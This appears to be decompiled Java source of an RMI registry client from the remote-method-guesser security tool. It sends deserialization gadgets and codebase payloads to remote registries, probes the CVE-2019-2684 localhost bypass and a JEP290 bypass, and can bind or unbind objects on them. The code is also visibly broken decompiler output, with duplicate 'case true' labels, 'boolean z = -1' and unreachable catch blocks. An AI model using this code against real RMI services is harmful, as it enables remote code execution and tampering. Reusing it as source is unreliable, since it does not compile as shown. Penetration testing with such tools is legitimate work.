package eu.tneitzel.rmg.operations;

import eu.tneitzel.rmg.internal.ExceptionHandler;
import eu.tneitzel.rmg.internal.MethodArguments;
import eu.tneitzel.rmg.internal.RMGOption;
import eu.tneitzel.rmg.internal.RMIComponent;
import eu.tneitzel.rmg.io.Logger;
import eu.tneitzel.rmg.io.MaliciousOutputStream;
import eu.tneitzel.rmg.networking.RMIEndpoint;
import eu.tneitzel.rmg.utils.RMGUtils;
import eu.tneitzel.rmg.utils.YsoIntegration;
import java.io.InvalidClassException;
import java.net.MalformedURLException;
import java.rmi.AccessException;
import java.rmi.AlreadyBoundException;
import java.rmi.NoSuchObjectException;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.rmi.ServerException;
import java.rmi.server.ObjID;
import javax.management.remote.rmi.RMIServerImpl_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

/* loaded from: input_file:eu/tneitzel/rmg/operations/RegistryClient.class */
public class RegistryClient {
    private RMIEndpoint rmi;
    private static final long interfaceHash = 4905912898345647071L;
    private static final ObjID objID = new ObjID(0);

    public RegistryClient(RMIEndpoint rMIEndpoint) {
        this.rmi = rMIEndpoint;
    }

    public void bindObject(String str, Object obj, boolean z) {
        String name = obj.getClass().getName();
        Logger.printMixedBlue("Binding name", str, "to ");
        Logger.printlnPlainBlue(name);
        Logger.lineBreak();
        Logger.increaseIndent();
        MethodArguments methodArguments = new MethodArguments(2);
        methodArguments.add(str, String.class);
        methodArguments.add(obj, Object.class);
        try {
            registryCall("bind", methodArguments, false, z);
            Logger.printlnMixedBlue("Encountered", "no Exception", "during bind call.");
            Logger.printlnMixedYellow("Bind operation", "was probably successful.");
        } catch (AlreadyBoundException e) {
            ExceptionHandler.alreadyBoundException(e, str);
        } catch (Exception e2) {
            ExceptionHandler.unexpectedException(e2, "bind", "call", false);
        } catch (ServerException e3) {
            Throwable cause = ExceptionHandler.getCause(e3);
            if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                ExceptionHandler.nonLocalhost(e3, "bind", z);
                return;
            }
            if ((cause instanceof AccessException) && cause.getMessage().contains("Cannot modify this registry")) {
                ExceptionHandler.singleEntryRegistry(e3, "bind");
                return;
            }
            if (cause instanceof ClassNotFoundException) {
                Logger.eprintlnMixedYellow("Bind operation", "was accepted", "by the server.");
                Logger.eprintlnMixedBlue("But the class", "RMIServerImpl_Stub", "was not found.");
                Logger.eprintln("The server probably runs on a JRE with limited module access.");
            } else {
                if (cause instanceof AlreadyBoundException) {
                    ExceptionHandler.alreadyBoundException(e3, str);
                    return;
                }
                if (cause instanceof InvalidClassException) {
                    ExceptionHandler.invalidClassBind(e3, "Bind", name);
                } else if (cause instanceof UnsupportedOperationException) {
                    ExceptionHandler.unsupportedOperationException(e3, "bind");
                } else {
                    ExceptionHandler.unexpectedException(e3, "bind", "call", false);
                }
            }
        }
    }

    public void rebindObject(String str, Object obj, boolean z) {
        String name = obj.getClass().getName();
        Logger.printMixedBlue("Rebinding name", str, "to ");
        Logger.printlnPlainBlue(name);
        Logger.lineBreak();
        Logger.increaseIndent();
        MethodArguments methodArguments = new MethodArguments(2);
        methodArguments.add(str, String.class);
        methodArguments.add(obj, Object.class);
        try {
            registryCall("rebind", methodArguments, false, z);
            Logger.printlnMixedBlue("Encountered", "no Exception", "during rebind call.");
            Logger.printlnMixedYellow("Rebind operation", "was probably successful.");
        } catch (Exception e) {
            ExceptionHandler.unexpectedException(e, "rebind", "call", false);
        } catch (ServerException e2) {
            Throwable cause = ExceptionHandler.getCause(e2);
            if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                ExceptionHandler.nonLocalhost(e2, "rebind", z);
                return;
            }
            if ((cause instanceof AccessException) && cause.getMessage().contains("Cannot modify this registry")) {
                ExceptionHandler.singleEntryRegistry(e2, "rebind");
                return;
            }
            if (cause instanceof ClassNotFoundException) {
                Logger.eprintlnMixedYellow("Rebind operation", "was accepted", "by the server.");
                Logger.eprintlnMixedBlue("But the class", "RMIServerImpl_Stub", "was not found.");
                Logger.eprintln("The server probably runs on a JRE with limited module access.");
            } else if (cause instanceof InvalidClassException) {
                ExceptionHandler.invalidClassBind(e2, "Rebind", name);
            } else if (cause instanceof UnsupportedOperationException) {
                ExceptionHandler.unsupportedOperationException(e2, "rebind");
            } else {
                ExceptionHandler.unexpectedException(e2, "rebind", "call", false);
            }
        }
    }

    public void unbindObject(String str, boolean z) {
        Logger.printlnMixedBlue("Unbinding bound name", str, "from the registry.");
        Logger.lineBreak();
        Logger.increaseIndent();
        MethodArguments methodArguments = new MethodArguments(1);
        methodArguments.add(str, String.class);
        try {
            registryCall("unbind", methodArguments, false, z);
            Logger.printlnMixedBlue("Encountered", "no Exception", "during unbind call.");
            Logger.printlnMixedYellow("Unbind operation", "was probably successful.");
        } catch (ServerException e) {
            Throwable cause = ExceptionHandler.getCause(e);
            if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                ExceptionHandler.nonLocalhost(e, "unbind", z);
            } else if ((cause instanceof AccessException) && cause.getMessage().contains("Cannot modify this registry")) {
                ExceptionHandler.singleEntryRegistry(e, "unbind");
            } else {
                ExceptionHandler.unexpectedException(e, "unbind", "call", false);
            }
        } catch (NotBoundException e2) {
            Logger.eprintlnMixedYellow("Caught", "NotBoundException", "during unbind call.");
            Logger.printlnMixedBlue("The name", str, "seems not to be bound to the registry.");
        } catch (Exception e3) {
            ExceptionHandler.unexpectedException(e3, "unbind", "call", false);
        }
    }

    public void enumCodebase(boolean z, String str, boolean z2) {
        Logger.printlnBlue("RMI server useCodebaseOnly enumeration:");
        Logger.lineBreak();
        Logger.increaseIndent();
        if (!z && str == "lookup") {
            Logger.printlnMixedYellow("- RMI registry uses", "readString()", "for unmarshalling java.lang.String.");
            Logger.printlnMixedBlue("  This prevents", "useCodebaseOnly", "enumeration from remote.");
            Logger.decreaseIndent();
            return;
        }
        MaliciousOutputStream.setDefaultLocation("InvalidURL");
        try {
            try {
                try {
                    try {
                        registryCall(str, packArgsByName(str, 0), true, z2);
                        Logger.decreaseIndent();
                        MaliciousOutputStream.resetDefaultLocation();
                    } catch (Exception e) {
                        ExceptionHandler.unexpectedException(e, str, "call", false);
                        Logger.decreaseIndent();
                        MaliciousOutputStream.resetDefaultLocation();
                    }
                } catch (ServerException e2) {
                    Throwable cause = ExceptionHandler.getCause(e2);
                    if (cause instanceof MalformedURLException) {
                        Logger.printlnMixedYellow("- Caught", "MalformedURLException", "during " + str + " call.");
                        Logger.printMixedBlue("  --> The server", "attempted to parse", "the provided codebase ");
                        Logger.printlnPlainYellow("(useCodebaseOnly=false).");
                        Logger.statusNonDefault();
                        ExceptionHandler.showStackTrace(e2);
                    } else if (cause instanceof ClassCastException) {
                        Logger.printlnMixedYellow("- Caught", "ClassCastException", "during " + str + " call.");
                        Logger.printMixedBlue("  --> The server", "ignored", "the provided codebase ");
                        Logger.printlnPlainYellow("(useCodebaseOnly=true).");
                        Logger.statusDefault();
                        ExceptionHandler.showStackTrace(e2);
                    } else if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                        Logger.eprintlnMixedYellow("Unable to enumerate useCodebaseOnly by using", str, "call.");
                        ExceptionHandler.nonLocalhost(e2, str, z2);
                    } else if (cause instanceof InvalidClassException) {
                        ExceptionHandler.invalidClassEnum(e2, str);
                    } else if (cause instanceof UnsupportedOperationException) {
                        ExceptionHandler.unsupportedOperationExceptionEnum(e2, str);
                    } else {
                        ExceptionHandler.unexpectedException(e2, str, "call", false);
                    }
                    Logger.decreaseIndent();
                    MaliciousOutputStream.resetDefaultLocation();
                }
            } catch (ClassCastException e3) {
                Logger.printlnMixedYellow("- Caught", "ClassCastException", "during " + str + " call.");
                Logger.printMixedBlue("  --> The server", "ignored", "the provided codebase ");
                Logger.printlnPlainYellow("(useCodebaseOnly=true).");
                Logger.statusDefault();
                ExceptionHandler.showStackTrace(e3);
                Logger.decreaseIndent();
                MaliciousOutputStream.resetDefaultLocation();
            }
        } catch (Throwable th) {
            Logger.decreaseIndent();
            MaliciousOutputStream.resetDefaultLocation();
            throw th;
        }
    }

    public boolean enumerateStringMarshalling() {
        boolean z = false;
        Logger.printlnBlue("RMI server String unmarshalling enumeration:");
        Logger.lineBreak();
        Logger.increaseIndent();
        MethodArguments methodArguments = new MethodArguments(1);
        methodArguments.add(0, Integer.class);
        try {
            try {
                registryCall("lookup", methodArguments, true, false);
                Logger.decreaseIndent();
            } catch (ClassCastException e) {
                if (e.getMessage().contains("java.lang.Integer cannot be cast to java.lang.String")) {
                    Logger.printlnMixedYellow("- Caught", "ClassCastException", "during lookup call.");
                    Logger.printMixedBlue("  --> The type", "java.lang.String", "is unmarshalled via ");
                    Logger.printlnPlainYellow("readObject().");
                    Logger.statusOutdated();
                    ExceptionHandler.showStackTrace(e);
                    z = true;
                } else {
                    ExceptionHandler.unexpectedException(e, "lookup", "call", false);
                }
                Logger.decreaseIndent();
            } catch (Exception e2) {
                ExceptionHandler.unexpectedException(e2, "lookup", "call", false);
                Logger.decreaseIndent();
            } catch (ServerException e3) {
                Throwable cause = ExceptionHandler.getCause(e3);
                if ((cause instanceof ClassCastException) && cause.getMessage().contains("Cannot cast an object to java.lang.String")) {
                    Logger.printlnMixedYellow("- Server complained that", "object cannot be casted to java.lang.String.");
                    Logger.printMixedBlue("  --> The type", "java.lang.String", "is unmarshalled via ");
                    Logger.printlnPlainYellow("readString().");
                    Logger.statusDefault();
                    ExceptionHandler.showStackTrace(e3);
                } else if (cause instanceof InvalidClassException) {
                    Logger.printMixedBlue("- Server rejected deserialization of", "java.lang.Integer");
                    Logger.printlnPlainYellow(" (JMX?)");
                    Logger.printMixedBlue("  --> The type", "java.lang.String", "is unmarshalled via ");
                    Logger.printlnPlainYellow("readObject().");
                    Logger.statusOutdated();
                    ExceptionHandler.showStackTrace(e3);
                    z = true;
                } else if (cause instanceof UnsupportedOperationException) {
                    Logger.printMixedBlue("- Server rejected deserialization of", "java.lang.Integer", "with an");
                    Logger.printPlainYellow(" UnsupportedOperationException");
                    Logger.printlnPlainBlue(" (NotSoSerial?)");
                    Logger.printMixedBlue("  --> The type", "java.lang.String", "is unmarshalled via ");
                    Logger.printlnPlainYellow("readObject().");
                    ExceptionHandler.showStackTrace(e3);
                } else if ((cause instanceof ClassNotFoundException) && cause.getMessage().contains("DefinitelyNonExistingClass")) {
                    Logger.printlnMixedYellow("- Caught", "ClassNotFoundException", "during lookup call.");
                    Logger.printMixedBlue("  --> The type", "java.lang.String", "is unmarshalled via ");
                    Logger.printlnPlainYellow("readObject().");
                    Logger.statusOutdated();
                    ExceptionHandler.showStackTrace(e3);
                    z = true;
                } else {
                    ExceptionHandler.unexpectedException(e3, "lookup", "call", false);
                }
                Logger.decreaseIndent();
            }
            return z;
        } catch (Throwable th) {
            Logger.decreaseIndent();
            throw th;
        }
    }

    public void enumLocalhostBypass() {
        Logger.printlnBlue("RMI registry localhost bypass enumeration (CVE-2019-2684):");
        Logger.lineBreak();
        Logger.increaseIndent();
        MethodArguments methodArguments = new MethodArguments(1);
        methodArguments.add("If this name exists on the registry, it is definitely the maintainers fault...", String.class);
        try {
            registryCall("unbind", methodArguments, false, true);
            ExceptionHandler.localhostBypassNoException();
        } catch (ServerException e) {
            Throwable cause = ExceptionHandler.getCause(e);
            if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                Logger.printlnMixedYellow("- Registry", "rejected unbind call", "cause it was not sent from localhost.");
                Logger.statusOk();
                ExceptionHandler.showStackTrace(e);
            } else if ((cause instanceof AccessException) && cause.getMessage().contains("Cannot modify this registry")) {
                ExceptionHandler.singleEntryRegistry(e, "unbind");
            } else {
                ExceptionHandler.unexpectedException(e, "unbind", "call", false);
            }
        } catch (NotBoundException e2) {
            Logger.printMixedYellow("- Caught", "NotBoundException", "during unbind call ");
            Logger.printlnPlainBlue("(unbind was accepted).");
            Logger.statusVulnerable();
            ExceptionHandler.showStackTrace(e2);
        } catch (Exception e3) {
            ExceptionHandler.unexpectedException(e3, "unbind", "call", false);
        } finally {
            Logger.decreaseIndent();
        }
    }

    public void enumJEP290Bypass(String str, boolean z, boolean z2) {
        Logger.printlnBlue("RMI registry JEP290 bypass enumeration:");
        Logger.lineBreak();
        Logger.increaseIndent();
        Object obj = null;
        if (!z2 && str == "lookup") {
            Logger.printlnMixedYellow("- RMI registry uses", "readString()", "for unmarshalling java.lang.String.");
            Logger.printlnMixedBlue("  This prevents", "JEP 290 bypass", "enumeration from remote.");
            return;
        }
        try {
            obj = YsoIntegration.prepareAnTrinhGadget("127.0.0.1", 1234567);
        } catch (Exception e) {
            ExceptionHandler.unexpectedException(e, "payload", "creation", true);
        }
        try {
            registryCall(str, packArgsByName(str, obj), false, z);
        } catch (ServerException e2) {
            Throwable cause = ExceptionHandler.getCause(e2);
            if ((cause instanceof AccessException) && cause.getMessage().contains("non-local host")) {
                ExceptionHandler.nonLocalhost(e2, str, z);
            } else if ((cause instanceof AccessException) && cause.getMessage().contains("Cannot modify this registry")) {
                ExceptionHandler.singleEntryRegistry(e2, str);
            } else if (cause instanceof RemoteException) {
                Logger.printMixedYellow("- Caught", "RemoteException", "after sending An Trinh gadget ");
                Logger.printlnPlainYellow("(An Trinh bypass patched).");
                ExceptionHandler.showStackTrace(e2);
                Logger.statusOk();
            } else if (cause instanceof InvalidClassException) {
                ExceptionHandler.invalidClassEnum(e2, str);
            } else if (cause instanceof UnsupportedOperationException) {
                ExceptionHandler.unsupportedOperationExceptionEnum(e2, str);
            } else {
                ExceptionHandler.unexpectedException(e2, str, "call", false);
            }
        } catch (IllegalArgumentException e3) {
            Logger.printlnMixedYellow("- Caught", "IllegalArgumentException", "after sending An Trinh gadget.");
            Logger.statusVulnerable();
            ExceptionHandler.showStackTrace(e3);
        } catch (Exception e4) {
            ExceptionHandler.unexpectedException(e4, str, "call", false);
        } finally {
            Logger.decreaseIndent();
        }
    }

    public void gadgetCall(Object obj, String str, boolean z) {
        Logger.printGadgetCallIntro("RMI Registry");
        try {
            registryCall(str, packArgsByName(str, obj), false, z);
        } catch (Exception e) {
            Throwable cause = ExceptionHandler.getCause(e);
            if (!(cause instanceof RemoteException) || !cause.getMessage().contains("Method is not Remote")) {
                ExceptionHandler.handleGadgetCallException(e, RMIComponent.REGISTRY, str);
                return;
            }
            Logger.printlnMixedYellow("Caught", "RemoteException", "during deserialization attack.");
            Logger.printMixedBlue("This is expected when", "An Trinh bypass", "was used and the server ");
            Logger.printlnPlainYellow("is patched.");
        }
    }

    public void codebaseCall(Object obj, String str, boolean z) {
        String name = obj.getClass().getName();
        Logger.printCodebaseAttackIntro("RMI Registry", str, name);
        try {
            registryCall(str, packArgsByName(str, obj), true, z);
        } catch (Exception e) {
            ExceptionHandler.handleCodebaseException(e, name, RMIComponent.REGISTRY, str);
        }
    }

    private void registryCall(String str, MethodArguments methodArguments, boolean z, boolean z2) throws Exception {
        try {
            if (z2) {
                this.rmi.genericCall(objID, -1, getHashByName(str), methodArguments, z, str);
            } else {
                this.rmi.genericCall(objID, getCallByName(str), interfaceHash, methodArguments, z, str);
            }
        } catch (NoSuchObjectException e) {
            ExceptionHandler.noSuchObjectException((Exception) e, "registry", false);
        }
    }

    private int getCallByName(String str) {
        boolean z = -1;
        switch (str.hashCode()) {
            case -1097094790:
                if (str.equals("lookup")) {
                    z = 2;
                    break;
                }
                break;
            case -934944528:
                if (str.equals("rebind")) {
                    z = 3;
                    break;
                }
                break;
            case -840745386:
                if (str.equals("unbind")) {
                    z = 4;
                    break;
                }
                break;
            case 3023933:
                if (str.equals("bind")) {
                    z = false;
                    break;
                }
                break;
            case 3322014:
                if (str.equals("list")) {
                    z = true;
                    break;
                }
                break;
        }
        switch (z) {
            case false:
                return 0;
            case true:
                return 1;
            case true:
                return 2;
            case true:
                return 3;
            case true:
                return 4;
            default:
                ExceptionHandler.internalError("RegistryClient.getCallIDByName", "Unable to find callID for method '" + str + "'.");
                return 0;
        }
    }

    private long getHashByName(String str) {
        boolean z = -1;
        switch (str.hashCode()) {
            case -1097094790:
                if (str.equals("lookup")) {
                    z = 2;
                    break;
                }
                break;
            case -934944528:
                if (str.equals("rebind")) {
                    z = 3;
                    break;
                }
                break;
            case -840745386:
                if (str.equals("unbind")) {
                    z = 4;
                    break;
                }
                break;
            case 3023933:
                if (str.equals("bind")) {
                    z = false;
                    break;
                }
                break;
            case 3322014:
                if (str.equals("list")) {
                    z = true;
                    break;
                }
                break;
        }
        switch (z) {
            case false:
                return 7583982177005850366L;
            case true:
                return 2571371476350237748L;
            case true:
                return -7538657168040752697L;
            case true:
                return -8381844669958460146L;
            case true:
                return 7305022919901907578L;
            default:
                ExceptionHandler.internalError("RegistryClient.getMethodHashByName", "Unable to find method hash for method '" + str + "'.");
                return 0L;
        }
    }

    private MethodArguments packArgsByName(String str, Object obj) {
        MethodArguments methodArguments = new MethodArguments(2);
        boolean z = -1;
        switch (str.hashCode()) {
            case -1097094790:
                if (str.equals("lookup")) {
                    z = 2;
                    break;
                }
                break;
            case -934944528:
                if (str.equals("rebind")) {
                    z = true;
                    break;
                }
                break;
            case -840745386:
                if (str.equals("unbind")) {
                    z = 3;
                    break;
                }
                break;
            case 3023933:
                if (str.equals("bind")) {
                    z = false;
                    break;
                }
                break;
        }
        switch (z) {
            case false:
            case true:
                methodArguments.add("rmg", String.class);
                methodArguments.add(obj, Object.class);
                break;
            case true:
            case true:
                methodArguments.add(obj, Object.class);
                break;
            default:
                ExceptionHandler.internalError("RegistryClient.packArgsByName", "Unable to find pack strategy for method '" + str + "'.");
                break;
        }
        return methodArguments;
    }

    public static Object prepareRMIServerImpl(String str, int i) {
        return new RMIServerImpl_Stub(new UnicastRef(new LiveRef(RMGOption.BIND_OBJID.notNull() ? RMGUtils.parseObjID((String) RMGOption.BIND_OBJID.getValue()) : new ObjID(), new TCPEndpoint(str, i), false)));
    }
}
